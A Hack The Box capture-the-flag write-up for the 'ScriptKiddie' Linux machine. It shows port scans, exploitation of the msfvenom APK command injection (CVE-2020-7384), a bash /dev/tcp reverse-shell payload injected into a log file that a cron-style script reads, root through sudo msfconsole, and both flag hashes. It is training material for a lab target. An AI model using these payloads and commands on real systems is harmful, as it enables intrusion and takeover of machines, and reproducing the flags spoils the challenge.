Skip to content

HTB ScriptKiddie done

ScriptKiddie

Notes

OS:

Linux

Technology:

Werkzeug httpd 0.16.1 (Python 3.8.5)

IP Address:

10.129.224.168

Open ports:

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)

Users and pass:

Nmap

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.224.168_nmap 10.129.224.168 ; cat 10.129.224.168_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali: 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-08 12:20 CEST
Nmap scan report for 10.129.224.168
Host is up (0.048s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 3c:65:6b:c2:df:b9:9d:62:74:27:a7:b8:a9:d3:25:2c (RSA)
|   256 b9:a1:78:5d:3c:1b:25:e0:3c:ef:67:8d:71:d3:a3:ec (ECDSA)
|_  256 8b:cf:41:82:c6:ac:ef:91:80:37:7c:c9:45:11:e8:43 (ED25519)
5000/tcp open  http    Werkzeug httpd 0.16.1 (Python 3.8.5)
|_http-title: k1d'5 h4ck3r t00l5
|_http-server-header: Werkzeug/0.16.1 Python/3.8.5

Ffuz: http://10.129.224.168:5000

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ ffuf -u http://10.129.224.168:5000/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o 10.129.224.168_5000_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.129.224.168:5000/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/big.txt
 :: Extensions       : .php .html .txt .bac .backup .md .git 
 :: Output file      : 10.129.224.168_5000_ffuz.{json,ejson,html,md,csv,ecsv}
 :: File format      : all
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

:: Progress: [163752/163752] :: Job [1/1] :: 297 req/sec :: Duration: [0:10:07] :: Errors: 0 ::

Exploit: CVE2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection

CVE2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection

Create revshell payload

CVE-2020-7384

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384]
└─$ ./CVE-2020-7384.sh                 
CVE-2020-7384

Enter a name for the exploit file (Press enter for default: shell): 

Enter the LHOST (Press enter for default: 10.10.14.59): 

Enter the LPORT (Press enter for default: 4444): 


Select the payload type (press enter for default: bash):
1. bash
2. nc
3. python
4. python3

select: 1

APK created at: /home/kali/Desktop/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384/shell.apk

To use the exploit on the vulnerable machine, run:
msfvenom -x shell.apk -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -o /dev/null

┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_ScriptKiddie/CVE-2020-7384]

Upload revshell

┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ netcat -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.59] from (UNKNOWN) [10.129.225.48] 56674
bash: cannot set terminal process group (937): Inappropriate ioctl for device
bash: no job control in this shell
kid@scriptkiddie:~/html$ 

ikid@scriptkiddie:~/html$  

kid@scriptkiddie:~/html$ id
id
uid=1000(kid) gid=1000(kid) groups=1000(kid)
kid@scriptkiddie:~/html$ 

Read flag: user.txt

kid@scriptkiddie:~/html$ find / -name "user.txt" 2>/dev/null
find / -name "user.txt" 2>/dev/null
/home/kid/user.txt
kid@scriptkiddie:~/html$ 

cakid@scriptkiddie:~/html$ t /home/kid/user.txt
cat /home/kid/user.txt
0658779559c0e3e75b39bd9692d7716e
kid@scriptkiddie:~/html$ 

Read file: /home/pwn/scanlosers.sh

We  can make command injection because cut get three parametr from left side
---
kid@scriptkiddie:/home/pwn$ cat  scanlosers.sh
cat  scanlosers.sh
#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

Create revshell

kid@scriptkiddie:~/logs$ echo "x x x 127.0.0.1; bash -c 'bash -i >& /dev/tcp/10.10.14.59/5000 0>&1' # ."  > hackers
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_ScriptKiddie]
└─$ netcat -lvnp 5000
listening on [any] 5000 ...
connect to [10.10.14.59] from (UNKNOWN) [10.129.225.48] 59932
bash: cannot set terminal process group (806): Inappropriate ioctl for device
bash: no job control in this shell
pwn@scriptkiddie:~$ 

sudo -l

pwn@scriptkiddie:~$ sudo -l
sudo -l
Matching Defaults entries for pwn on scriptkiddie:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User pwn may run the following commands on scriptkiddie:
    (root) NOPASSWD: /opt/metasploit-framework-6.0.9/msfconsole

Privilege Escalation:

GTFObins - msfconsole

pwn@scriptkiddie:~$ sudo msfconsole
sudo msfconsole


 ______________________________________________________________________________
|                                                                              |
|                          3Kom SuperHack II Logon                             |
|______________________________________________________________________________|
|                                                                              |
|                                                                              |
|                                                                              |
|                 User Name:          [   security    ]                        |
|                                                                              |
|                 Password:           [               ]                        |
|                                                                              |
|                                                                              |
|                                                                              |
|                                   [ OK ]                                     |
|______________________________________________________________________________|
|                                                                              |
|                                                       https://metasploit.com |
|______________________________________________________________________________|


       =[ metasploit v6.0.9-dev                           ]
+ -- --=[ 2069 exploits - 1122 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

Metasploit tip: Display the Framework log using the log command, learn more with help log

stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
stty: 'standard input': Inappropriate ioctl for device
msf6 > irb
stty: 'standard input': Inappropriate ioctl for device
[*] Starting IRB shell...
[*] You are in the "framework" object

system("bash")
Switch to inspect mode.
irb: warn: can't alias jobs from irb_jobs.
>> system("bash")
id
uid=0(root) gid=0(root) groups=0(root)

Read flag: root.txt

id
uid=0(root) gid=0(root) groups=0(root)

cd /root/
ls -a
.
..
.bash_history
.bashrc
.cache
.gem
.lesshst
.local
.msf4
.profile
.selected_editor
.viminfo
root.txt
snap

cat root.txt
41380278d6f60ccbfff7b4637e017ec9

References

[CVE2020-7384 - Metasploit Framework 6.0.11 - msfvenom APK template command injection](https://www.exploit-db.com/exploits/49491)
[CVE-2020-7384](https://github.com/CarsonShaffer/CVE-2020-7384)

Lessons Learned

Tags